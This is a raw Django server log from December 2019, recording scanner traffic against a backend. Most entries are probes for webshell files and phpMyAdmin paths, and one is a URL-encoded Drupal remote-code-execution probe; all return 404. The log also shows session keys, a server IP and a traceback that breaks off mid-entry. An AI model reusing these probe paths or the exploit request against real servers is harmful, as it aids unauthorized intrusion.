HTTP/1.0" 404 6626 Not Found: /yuyang.php [07/Dec/2019 16:20:09] "GET /yuyang.php HTTP/1.0" 404 6623 Not Found: /zz.php [07/Dec/2019 16:20:10] "GET /zz.php HTTP/1.0" 404 6611 Not Found: /coonig.php [07/Dec/2019 16:20:12] "GET /coonig.php HTTP/1.0" 404 6623 Not Found: /ak.php [07/Dec/2019 16:20:13] "GET /ak.php HTTP/1.0" 404 6611 Not Found: /baidoubi.php [07/Dec/2019 16:20:14] "GET /baidoubi.php HTTP/1.0" 404 6629 Not Found: /hhhhhh.php [07/Dec/2019 16:20:17] "GET /hhhhhh.php HTTP/1.0" 404 6623 Not Found: /meijianxue.php [07/Dec/2019 16:20:18] "GET /meijianxue.php HTTP/1.0" 404 6635 Not Found: /no1.php [07/Dec/2019 16:20:18] "GET /no1.php HTTP/1.0" 404 6614 Not Found: /python.php [07/Dec/2019 16:20:20] "GET /python.php HTTP/1.0" 404 6623 Not Found: /woshimengmei.php [07/Dec/2019 16:20:21] "GET /woshimengmei.php HTTP/1.0" 404 6641 Not Found: /indea.php [07/Dec/2019 16:20:21] "GET /indea.php HTTP/1.0" 404 6620 Not Found: /taisui.php [07/Dec/2019 16:20:21] "GET /taisui.php HTTP/1.0" 404 6623 Not Found: /kk.php [07/Dec/2019 16:20:24] "GET /kk.php HTTP/1.0" 404 6611 Not Found: /xsser.php [07/Dec/2019 16:20:25] "GET /xsser.php HTTP/1.0" 404 6620 Not Found: /zzz.php [07/Dec/2019 16:20:25] "GET /zzz.php HTTP/1.0" 404 6614 Not Found: /99.php [07/Dec/2019 16:20:25] "GET /99.php HTTP/1.0" 404 6611 Not Found: /dp.php [07/Dec/2019 16:20:26] "GET /dp.php HTTP/1.0" 404 6611 Not Found: /1ts.php [07/Dec/2019 16:20:29] "GET /1ts.php HTTP/1.0" 404 6614 Not Found: /haiyan.php [07/Dec/2019 16:20:30] "GET /haiyan.php HTTP/1.0" 404 6623 Not Found: /phpdm.php [07/Dec/2019 16:20:30] "GET /phpdm.php HTTP/1.0" 404 6620 Not Found: /5678.php [07/Dec/2019 16:20:32] "GET /5678.php HTTP/1.0" 404 6617 Not Found: /root11.php [07/Dec/2019 16:20:33] "GET /root11.php HTTP/1.0" 404 6623 Not Found: /xiu.php [07/Dec/2019 16:20:33] "GET /xiu.php HTTP/1.0" 404 6614 Not Found: /xw.php [07/Dec/2019 16:20:38] "POST /xw.php HTTP/1.0" 404 6612 Not Found: /xw1.php [07/Dec/2019 16:20:38] "POST /xw1.php HTTP/1.0" 404 6615 Not Found: /9678.php [07/Dec/2019 16:20:39] "POST /9678.php HTTP/1.0" 404 6618 Not Found: /wc.php [07/Dec/2019 16:20:40] "POST /wc.php HTTP/1.0" 404 6612 Not Found: /xx.php [07/Dec/2019 16:20:40] "POST /xx.php HTTP/1.0" 404 6612 Not Found: /xx.php [07/Dec/2019 16:20:44] "POST /xx.php HTTP/1.0" 404 6612 Not Found: /s.php [07/Dec/2019 16:20:48] "POST /s.php HTTP/1.0" 404 6609 Not Found: /sheep.php [07/Dec/2019 16:20:52] "POST /sheep.php HTTP/1.0" 404 6621 Not Found: /qaq.php [07/Dec/2019 16:20:53] "POST /qaq.php HTTP/1.0" 404 6615 Not Found: /my.php [07/Dec/2019 16:20:53] "POST /my.php HTTP/1.0" 404 6612 Not Found: /qq.php [07/Dec/2019 16:20:56] "POST /qq.php HTTP/1.0" 404 6612 Not Found: /aaa.php [07/Dec/2019 16:20:56] "POST /aaa.php HTTP/1.0" 404 6615 Not Found: /hhh.php [07/Dec/2019 16:20:57] "POST /hhh.php HTTP/1.0" 404 6615 Not Found: /jjj.php [07/Dec/2019 16:21:00] "POST /jjj.php HTTP/1.0" 404 6615 Not Found: /vvv.php [07/Dec/2019 16:21:01] "POST /vvv.php HTTP/1.0" 404 6615 Not Found: /ffr.php [07/Dec/2019 16:21:04] "POST /ffr.php HTTP/1.0" 404 6615 Not Found: /411.php [07/Dec/2019 16:21:05] "POST /411.php HTTP/1.0" 404 6615 Not Found: /415.php [07/Dec/2019 16:21:05] "POST /415.php HTTP/1.0" 404 6615 Not Found: /444.php [07/Dec/2019 16:21:08] "POST /444.php HTTP/1.0" 404 6615 Not Found: /a411.php [07/Dec/2019 16:21:10] "POST /a411.php HTTP/1.0" 404 6618 Not Found: /whoami.php.php [07/Dec/2019 16:21:12] "POST /whoami.php.php HTTP/1.0" 404 6636 Not Found: /9.php [07/Dec/2019 16:21:13] "POST /9.php HTTP/1.0" 404 6609 Not Found: /981.php [07/Dec/2019 16:21:16] "POST /981.php HTTP/1.0" 404 6615 Not Found: /888.php [07/Dec/2019 16:21:21] "POST /888.php HTTP/1.0" 404 6615 Not Found: /aa.php [07/Dec/2019 16:21:21] "POST /aa.php HTTP/1.0" 404 6612 Not Found: /bb.php [07/Dec/2019 16:21:22] "POST /bb.php HTTP/1.0" 404 6612 Not Found: /pp.php [07/Dec/2019 16:21:23] "POST /pp.php HTTP/1.0" 404 6612 [07/Dec/2019 16:21:24] "GET / HTTP/1.0" 302 0 Not Found: /bbq.php [07/Dec/2019 16:21:24] "POST /bbq.php HTTP/1.0" 404 6615 Not Found: /jj1.php [07/Dec/2019 16:21:25] "POST /jj1.php HTTP/1.0" 404 6615 Not Found: /jbb.php [07/Dec/2019 16:21:25] "POST /jbb.php HTTP/1.0" 404 6615 Not Found: /7o.php [07/Dec/2019 16:21:26] "POST /7o.php HTTP/1.0" 404 6612 Not Found: /nb.php [07/Dec/2019 16:21:28] "POST /nb.php HTTP/1.0" 404 6612 Not Found: /kpl.php [07/Dec/2019 16:21:29] "POST /kpl.php HTTP/1.0" 404 6615 Not Found: /hgx.php [07/Dec/2019 16:21:29] "POST /hgx.php HTTP/1.0" 404 6615 Not Found: /ppl.php [07/Dec/2019 16:21:31] "POST /ppl.php HTTP/1.0" 404 6615 Not Found: /tty.php [07/Dec/2019 16:21:31] "POST /tty.php HTTP/1.0" 404 6615 Not Found: /ooi.php [07/Dec/2019 16:21:32] "POST /ooi.php HTTP/1.0" 404 6615 Not Found: /weaver/bsh.servlet.BshServlet [07/Dec/2019 16:21:48] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6680 Not Found: /index.php [07/Dec/2019 16:21:52] "POST /index.php HTTP/1.0" 404 6621 Not Found: /user/register [07/Dec/2019 16:21:54] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6870 [07/Dec/2019 16:21:56] "GET / HTTP/1.0" 302 0 Not Found: /user.php [07/Dec/2019 16:21:56] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6618 Not Found: /index.php [07/Dec/2019 16:21:57] "GET /index.php HTTP/1.0" 404 6620 Not Found: /phpmyadmin/index.php [07/Dec/2019 16:22:00] "GET /phpmyadmin/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin/index.php [07/Dec/2019 16:22:01] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /pmd/index.php [07/Dec/2019 16:22:01] "GET /pmd/index.php HTTP/1.0" 404 6632 Not Found: /pma/index.php [07/Dec/2019 16:22:04] "GET /pma/index.php HTTP/1.0" 404 6632 Not Found: /PMA/index.php [07/Dec/2019 16:22:05] "GET /PMA/index.php HTTP/1.0" 404 6632 Not Found: /pmamy/index.php [07/Dec/2019 16:22:08] "GET /pmamy/index.php HTTP/1.0" 404 6638 Not Found: /pmamy2/index.php [07/Dec/2019 16:22:09] "GET /pmamy2/index.php HTTP/1.0" 404 6641 Not Found: /mysql/index.php [07/Dec/2019 16:22:09] "GET /mysql/index.php HTTP/1.0" 404 6638 Not Found: /db/index.php [07/Dec/2019 16:22:16] "GET /db/index.php HTTP/1.0" 404 6629 Not Found: /dbadmin/index.php [07/Dec/2019 16:22:18] "GET /dbadmin/index.php HTTP/1.0" 404 6644 Not Found: /web/phpMyAdmin/index.php [07/Dec/2019 16:22:20] "GET /web/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /admin/pma/index.php [07/Dec/2019 16:22:20] "GET /admin/pma/index.php HTTP/1.0" 404 9257 Not Found: /admin/PMA/index.php [07/Dec/2019 16:22:22] "GET /admin/PMA/index.php HTTP/1.0" 404 9257 Not Found: /admin/mysql/index.php [07/Dec/2019 16:22:23] "GET /admin/mysql/index.php HTTP/1.0" 404 9263 Not Found: /admin/mysql2/index.php [07/Dec/2019 16:22:24] "GET /admin/mysql2/index.php HTTP/1.0" 404 9266 Not Found: /admin/phpmyadmin/index.php [07/Dec/2019 16:22:25] "GET /admin/phpmyadmin/index.php HTTP/1.0" 404 9278 Not Found: /admin/phpMyAdmin/index.php [07/Dec/2019 16:22:25] "GET /admin/phpMyAdmin/index.php HTTP/1.0" 404 9278 Not Found: /admin/phpmyadmin2/index.php [07/Dec/2019 16:22:25] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 9281 Not Found: /mysqladmin/index.php [07/Dec/2019 16:22:26] "GET /mysqladmin/index.php HTTP/1.0" 404 6653 Not Found: /mysql_admin/index.php [07/Dec/2019 16:22:28] "GET /mysql_admin/index.php HTTP/1.0" 404 6656 Not Found: /phpadmin/index.php [07/Dec/2019 16:22:30] "GET /phpadmin/index.php HTTP/1.0" 404 6647 Not Found: /phpAdmin/index.php [07/Dec/2019 16:22:30] "GET /phpAdmin/index.php HTTP/1.0" 404 6647 Not Found: /phpmyadmin0/index.php [07/Dec/2019 16:22:31] "GET /phpmyadmin0/index.php HTTP/1.0" 404 6656 Not Found: /phpmyadmin2/index.php [07/Dec/2019 16:22:32] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmin-4.4.0/index.php [07/Dec/2019 16:22:33] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6671 Not Found: /phpMyAdmin4.8.0/index.php [07/Dec/2019 16:22:33] "GET /phpMyAdmin4.8.0/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.5/index.php [07/Dec/2019 16:22:52] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6668 Not Found: /myadmin2/index.php [07/Dec/2019 16:22:56] "GET /myadmin2/index.php HTTP/1.0" 404 6647 Not Found: /phpMyadmin_bak/index.php [07/Dec/2019 16:23:00] "GET /phpMyadmin_bak/index.php HTTP/1.0" 404 6665 Not Found: /tools/phpMyAdmin/index.php [07/Dec/2019 16:23:04] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6671 Not Found: /phpmyadmin-old/index.php [07/Dec/2019 16:23:04] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdminold/index.php [07/Dec/2019 16:23:05] "GET /phpMyAdminold/index.php HTTP/1.0" 404 6662 Not Found: /phpMyAdmin.old/index.php [07/Dec/2019 16:23:05] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6665 Not Found: /claroline/phpMyAdmin/index.php [07/Dec/2019 16:23:08] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6683 Not Found: /typo3/phpmyadmin/index.php [07/Dec/2019 16:23:09] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6671 Not Found: /phpma/index.php [07/Dec/2019 16:23:09] "GET /phpma/index.php HTTP/1.0" 404 6638 Not Found: /phpmyadmin/phpmyadmin/index.php [07/Dec/2019 16:23:10] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.0" 404 6686 Not Found: /phpMyAdmin/phpMyAdmin/index.php [07/Dec/2019 16:23:10] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.0" 404 6686 Not Found: /phpMyAbmin/index.php [07/Dec/2019 16:23:12] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin__/index.php [07/Dec/2019 16:23:13] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6659 Not Found: /phpMyAdmin+++---/index.php [07/Dec/2019 16:23:13] "GET /phpMyAdmin+++---/index.php HTTP/1.0" 404 6671 Not Found: /v/index.php [07/Dec/2019 16:23:14] "GET /v/index.php HTTP/1.0" 404 6626 Not Found: /phpmyadm1n/index.php [07/Dec/2019 16:23:14] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdm1n/index.php [07/Dec/2019 16:23:15] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6653 Not Found: /shaAdmin/index.php [07/Dec/2019 16:23:16] "GET /shaAdmin/index.php HTTP/1.0" 404 6647 Not Found: /phpMyadmi/index.php [07/Dec/2019 16:23:18] "GET /phpMyadmi/index.php HTTP/1.0" 404 6650 Not Found: /phpMyAdmion/index.php [07/Dec/2019 16:23:18] "GET /phpMyAdmion/index.php HTTP/1.0" 404 6656 Not Found: /s/index.php [07/Dec/2019 16:23:18] "GET /s/index.php HTTP/1.0" 404 6626 Not Found: /MyAdmin/index.php [07/Dec/2019 16:23:19] "GET /MyAdmin/index.php HTTP/1.0" 404 6644 Not Found: /phpMyAdmin1/index.php [07/Dec/2019 16:23:20] "GET /phpMyAdmin1/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmin123/index.php [07/Dec/2019 16:23:21] "GET /phpMyAdmin123/index.php HTTP/1.0" 404 6662 Not Found: /pwd/index.php [07/Dec/2019 16:23:22] "GET /pwd/index.php HTTP/1.0" 404 6632 Not Found: /phpMyAdmina/index.php [07/Dec/2019 16:23:23] "GET /phpMyAdmina/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmins/index.php [07/Dec/2019 16:23:24] "GET /phpMyAdmins/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmin._/index.php [07/Dec/2019 16:23:24] "GET /phpMyAdmin._/index.php HTTP/1.0" 404 6659 Not Found: /phpMyAdmin._2/index.php [07/Dec/2019 16:23:26] "GET /phpMyAdmin._2/index.php HTTP/1.0" 404 6662 Not Found: /phpMyAdmin333/index.php [07/Dec/2019 16:23:29] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6662 Not Found: /phpmyadmin3333/index.php [07/Dec/2019 16:23:30] "GET /phpmyadmin3333/index.php HTTP/1.0" 404 6665 Not Found: /php2MyAdmin/index.php [07/Dec/2019 16:23:30] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6656 Not Found: /phpNyAdmin/index.php [07/Dec/2019 16:23:32] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /1/index.php [07/Dec/2019 16:23:33] "GET /1/index.php HTTP/1.0" 404 6626 Not Found: /download/index.php [07/Dec/2019 16:23:33] "GET /download/index.php HTTP/1.0" 404 6647 Not Found: /phpMyAdmin_111/index.php [07/Dec/2019 16:23:34] "GET /phpMyAdmin_111/index.php HTTP/1.0" 404 6665 Not Found: /321/index.php [07/Dec/2019 16:23:36] "GET /321/index.php HTTP/1.0" 404 6632 Not Found: /123131/index.php [07/Dec/2019 16:23:37] "GET /123131/index.php HTTP/1.0" 404 6641 Not Found: /phpMyAdminn/index.php [07/Dec/2019 16:23:37] "GET /phpMyAdminn/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdminhf/index.php [07/Dec/2019 16:23:38] "GET /phpMyAdminhf/index.php HTTP/1.0" 404 6659 Not Found: /sbb/index.php [07/Dec/2019 16:23:38] "GET /sbb/index.php HTTP/1.0" 404 6632 Not Found: /WWW/phpMyAdmin/index.php [07/Dec/2019 16:23:39] "GET /WWW/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdmin_ai/index.php [07/Dec/2019 16:23:40] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6662 Not Found: /__phpMyAdmin/index.php [07/Dec/2019 16:23:41] "GET /__phpMyAdmin/index.php HTTP/1.0" 404 6659 Not Found: /program/index.php [07/Dec/2019 16:23:42] "GET /program/index.php HTTP/1.0" 404 6644 Not Found: /shopdb/index.php [07/Dec/2019 16:23:43] "GET /shopdb/index.php HTTP/1.0" 404 6641 Not Found: /mysql/admin/index.php [07/Dec/2019 16:23:52] "GET /mysql/admin/index.php HTTP/1.0" 404 6656 Not Found: /mysql/sqlmanager/index.php [07/Dec/2019 16:23:56] "GET /mysql/sqlmanager/index.php HTTP/1.0" 404 6671 Not Found: /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php [07/Dec/2019 16:24:00] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.0" 404 6770 Not Found: /sqladmin/index.php [07/Dec/2019 16:24:01] "GET /sqladmin/index.php HTTP/1.0" 404 6647 Not Found: /sql/index.php [07/Dec/2019 16:24:01] "GET /sql/index.php HTTP/1.0" 404 6632 Not Found: /SQL/index.php [07/Dec/2019 16:24:05] "GET /SQL/index.php HTTP/1.0" 404 6632 Not Found: /websql/index.php [07/Dec/2019 16:24:06] "GET /websql/index.php HTTP/1.0" 404 6641 Not Found: /manager/html [07/Dec/2019 16:24:08] "GET /manager/html HTTP/1.0" 404 6629 [07/Dec/2019 16:26:27] "GET / HTTP/1.0" 302 0 [07/Dec/2019 16:31:29] "GET / HTTP/1.0" 302 0 [07/Dec/2019 16:31:46] "GET / HTTP/1.0" 302 0 [07/Dec/2019 16:39:35] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [07/Dec/2019 16:44:37] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [07/Dec/2019 16:44:39] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=103 HTTP/1.0" 404 6705 Not Found: /newslist.asp [07/Dec/2019 16:44:40] "GET /newslist.asp?type=4&id=1289 HTTP/1.0" 404 6649 [07/Dec/2019 16:47:10] "GET / HTTP/1.0" 302 0 [07/Dec/2019 16:52:13] "GET / HTTP/1.0" 302 0 [07/Dec/2019 16:57:16] "GET / HTTP/1.0" 302 0 [07/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [07/Dec/2019 17:10:06] "GET / HTTP/1.0" 302 0 [07/Dec/2019 17:12:01] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 17:12:01,959 utils 32196 139885061072640 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'f00wi4gqhv73mbzaty2hxdpttx5vafuc' LIMIT 1; args=('f00wi4gqhv73mbzaty2hxdpttx5vafuc',) DEBUG 2019-12-07 17:12:01,961 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('f00wi4gqhv73mbzaty2hxdpttx5vafuc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T17:12:01.959984+00:00'::timestamptz); args=('f00wi4gqhv73mbzaty2hxdpttx5vafuc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 17, 12, 1, 959984, tzinfo=)) [07/Dec/2019 17:12:01] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 17:19:50] "GET / HTTP/1.0" 302 0 [07/Dec/2019 17:24:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 17:24:25,646 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '89i3psjf6frbe1h72rafz5pksa14b9t5' LIMIT 1; args=('89i3psjf6frbe1h72rafz5pksa14b9t5',) DEBUG 2019-12-07 17:24:25,649 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('89i3psjf6frbe1h72rafz5pksa14b9t5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T17:24:25.647114+00:00'::timestamptz); args=('89i3psjf6frbe1h72rafz5pksa14b9t5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 17, 24, 25, 647114, tzinfo=)) [07/Dec/2019 17:24:25] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 17:24:53] "GET / HTTP/1.0" 302 0 [07/Dec/2019 17:31:06] "GET / HTTP/1.0" 302 0 [07/Dec/2019 17:33:58] "GET / HTTP/1.0" 302 0 [07/Dec/2019 17:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 17:45:34] "GET / HTTP/1.0" 302 0 [07/Dec/2019 17:50:39] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:00:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:05:04] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:11:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:16:05] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:21:08] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:27:30] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:32:33] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:51:21] "GET / HTTP/1.0" 302 0 [07/Dec/2019 18:56:24] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:02:20] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:20:11] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:25:14] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:25:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 19:25:22,079 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '34nr43n2ig6hnkzditzuy8ymxatjgqzm' LIMIT 1; args=('34nr43n2ig6hnkzditzuy8ymxatjgqzm',) DEBUG 2019-12-07 19:25:22,081 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('34nr43n2ig6hnkzditzuy8ymxatjgqzm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T19:25:22.079736+00:00'::timestamptz); args=('34nr43n2ig6hnkzditzuy8ymxatjgqzm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 19, 25, 22, 79736, tzinfo=)) [07/Dec/2019 19:25:22] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 19:30:17] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:37:37] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [07/Dec/2019 19:40:36] "GET /proxy.php HTTP/1.0" 404 6629 [07/Dec/2019 19:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:47:42] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:52:45] "GET / HTTP/1.0" 302 0 [07/Dec/2019 19:59:14] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [07/Dec/2019 20:04:13] "GET /robots.txt HTTP/1.0" 404 6624 [07/Dec/2019 20:04:13] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 20:04:13,371 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hhftlaetlf54ody7c6zikfp29ibw9vgr' LIMIT 1; args=('hhftlaetlf54ody7c6zikfp29ibw9vgr',) DEBUG 2019-12-07 20:04:13,374 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hhftlaetlf54ody7c6zikfp29ibw9vgr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T20:04:13.372277+00:00'::timestamptz); args=('hhftlaetlf54ody7c6zikfp29ibw9vgr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 20, 4, 13, 372277, tzinfo=)) [07/Dec/2019 20:04:13] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 20:05:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [07/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [07/Dec/2019 20:23:44] "GET / HTTP/1.0" 302 0 [07/Dec/2019 20:28:47] "GET / HTTP/1.0" 302 0 [07/Dec/2019 20:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 20:42:39] "GET / HTTP/1.0" 302 0 [07/Dec/2019 20:47:42] "GET / HTTP/1.0" 302 0 [07/Dec/2019 20:52:45] "GET / HTTP/1.0" 302 0 [07/Dec/2019 20:57:48] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:10:06] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:14:16] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:15:09] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:20:11] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [07/Dec/2019 21:25:34] "GET /robots.txt HTTP/1.0" 404 6624 [07/Dec/2019 21:26:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 21:26:22,562 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'f92unfmltvv4ynw64zni9cavdm8espls' LIMIT 1; args=('f92unfmltvv4ynw64zni9cavdm8espls',) DEBUG 2019-12-07 21:26:22,565 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('f92unfmltvv4ynw64zni9cavdm8espls', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T21:26:22.563516+00:00'::timestamptz); args=('f92unfmltvv4ynw64zni9cavdm8espls', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 21, 26, 22, 563516, tzinfo=)) [07/Dec/2019 21:26:22] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 21:26:46] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:31:48] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 21:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:49:33] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:50:02] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 21:54:38] "GET / HTTP/1.0" 302 0 [07/Dec/2019 21:59:59] "GET / HTTP/1.0" 302 0 [07/Dec/2019 22:05:18] "GET / HTTP/1.0" 302 0 [07/Dec/2019 22:10:38] "GET / HTTP/1.0" 302 0 [07/Dec/2019 22:15:53] "GET / HTTP/1.0" 302 0 [07/Dec/2019 22:21:03] "GET / HTTP/1.0" 302 0 [07/Dec/2019 22:26:45] "GET / HTTP/1.0" 302 0 [07/Dec/2019 22:31:48] "GET / HTTP/1.0" 302 0 [07/Dec/2019 22:37:37] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 27.126.206.97/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [07/Dec/2019 22:40:57] "POST /editBlackAndWhiteList HTTP/1.0" 500 63831 [07/Dec/2019 22:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 22:47:43] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File 